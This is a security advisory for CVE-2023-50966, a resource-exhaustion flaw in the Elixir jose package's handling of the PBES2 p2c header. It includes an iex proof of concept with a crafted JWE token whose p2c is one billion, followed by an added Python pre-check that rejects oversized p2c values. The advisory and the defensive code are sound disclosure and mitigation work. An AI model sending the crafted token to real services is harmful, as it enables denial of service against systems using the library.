Resource Exhaustion Affecting jose package, versions *
Snyk CVSS
- Attack Complexity: Low
Threat Intelligence
- Exploit Maturity: Proof of concept
- EPSS: 0.05% (15th percentile)
- Snyk ID SNYK-HEX-JOSE-6468183
- published 20 Mar 2024
- disclosed 19 Mar 2024
- credit P3ngu1nW
Introduced: 19 Mar 2024
CVE-2023-50966
How to fix?
There is no fixed version for jose.
Overview
Affected versions of this package are vulnerable to Resource Exhaustion due to improper validation of the p2c (PBES2 Count) value in a JOSE header. Because p2c is the PBKDF2 iteration count the recipient must run before it can even check the wrapped key, an attacker can cause excessive CPU consumption by sending crafted JOSE headers with a very large p2c.
PoC
iex(1)> jwk_secret = JOSE.JWK.from_oct("secret")
#JOSE.JWK<keys: :undefined, fields: %{}, ...>
iex(2)> JOSE.JWE.block_decrypt(jwk_secret, "eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIiwicDJjIjoxMDAwMDAwMDAwLCJwMnMiOiJmbmcxUVJNU1ljWDljb2s4RUhHWWhnIn0.YZBzMWbcndBWvOjf4c3R2oPtRsRqSKDc.rv6Qc-lKE0WA6-MI.bHE.hNkOsML8iJJWbd1KwDEGHQ") |> elem(0)
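A defender-side pre-check, added here as an example and not part of the advisory or of the jose package: parse the protected header of a compact JWE and refuse any PBES2 token whose p2c exceeds a local ceiling before the token reaches block_decrypt, so no key derivation runs on attacker-chosen iteration counts. MAX_P2C, PBES2_ALGS, check_p2c and make_token are this example's own names; the token constant is the one from the PoC above.

```python
import base64
import json

# Assumed policy ceiling for the PBES2 iteration count (this example's own
# value, not from the jose package); size it to what your service tolerates.
MAX_P2C = 10_000
PBES2_ALGS = {"PBES2-HS256+A128KW", "PBES2-HS384+A192KW", "PBES2-HS512+A256KW"}

def _b64url_decode(segment: str) -> bytes:
    # JOSE uses unpadded base64url; restore padding before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def protected_header(compact_jwe: str) -> dict:
    """Parse the protected header (first segment) of a compact JWE."""
    parts = compact_jwe.split(".")
    if len(parts) != 5:
        raise ValueError("expected 5 dot-separated segments")
    header = json.loads(_b64url_decode(parts[0]))
    if not isinstance(header, dict):
        raise ValueError("protected header is not a JSON object")
    return header

def check_p2c(compact_jwe: str, max_p2c: int = MAX_P2C) -> tuple:
    """Return (ok, reason); run this before any PBES2 key derivation."""
    try:
        header = protected_header(compact_jwe)
    except ValueError as exc:  # also catches base64, JSON and UTF-8 errors
        return False, f"unparseable protected header: {exc}"
    alg = header.get("alg")
    if alg not in PBES2_ALGS:
        return True, f"alg {alg!r} does not use p2c"
    p2c = header.get("p2c")
    # bool is an int subclass in Python, so reject it explicitly.
    if isinstance(p2c, bool) or not isinstance(p2c, int) or p2c < 1:
        return False, f"p2c must be a positive integer, got {p2c!r}"
    if p2c > max_p2c:
        return False, f"p2c={p2c} exceeds limit {max_p2c}"
    return True, f"p2c={p2c} within limit"

def make_token(header: dict) -> str:
    """Constructed compact JWE: real header, dummy remaining four segments."""
    head = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip("=")
    return ".".join([head] + ["AA"] * 4)

# Token from the advisory's PoC; its protected header carries p2c=1000000000.
POC_TOKEN = (
    "eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIiwicDJjIjoxMDAwMDAwMDAwLCJwMnMiOiJmbmcxUVJNU1ljWDljb2s4RUhHWWhnIn0"
    ".YZBzMWbcndBWvOjf4c3R2oPtRsRqSKDc.rv6Qc-lKE0WA6-MI.bHE.hNkOsML8iJJWbd1KwDEGHQ"
)
```

Calling check_p2c(POC_TOKEN) returns False with the reason that p2c=1000000000 exceeds the limit, while a token with a modest p2c or a non-PBES2 alg passes through to the library unchanged.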